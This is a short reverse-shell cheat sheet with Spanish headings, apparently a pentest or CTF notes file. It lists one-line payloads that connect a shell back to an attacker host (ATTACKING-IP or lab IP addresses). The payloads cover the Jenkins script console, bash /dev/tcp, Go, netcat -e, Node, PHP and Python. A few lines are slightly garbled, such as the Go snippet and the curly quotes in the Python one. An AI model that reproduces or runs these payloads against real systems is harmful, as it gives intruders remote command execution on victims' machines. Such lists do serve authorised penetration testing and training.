
############################################################### Java (jenkins)
conseguir shell inversa desde el script console
r = Runtime.getRuntime()
p = r.exec (["/bin/bash","-c","exec 5<>/dev/tcp/10.18.1.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


lograr una bash:
/bin/bash -i

buscar un archivo en el entorno de docker:
find / -name *.txt


############################################################## BASH

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

####
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

####
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

############################################################# Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

############################################################# Netcat

nc -e /bin/sh ATTACKING-IP 80

############################################################  Node


require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');

##################################### PHP
php -r '$sock=fsockopen("10.14.55.255",666);exec("/bin/sh -i <&3 >&3 2>&3");'

#####################################PYHON
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.207.168”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);
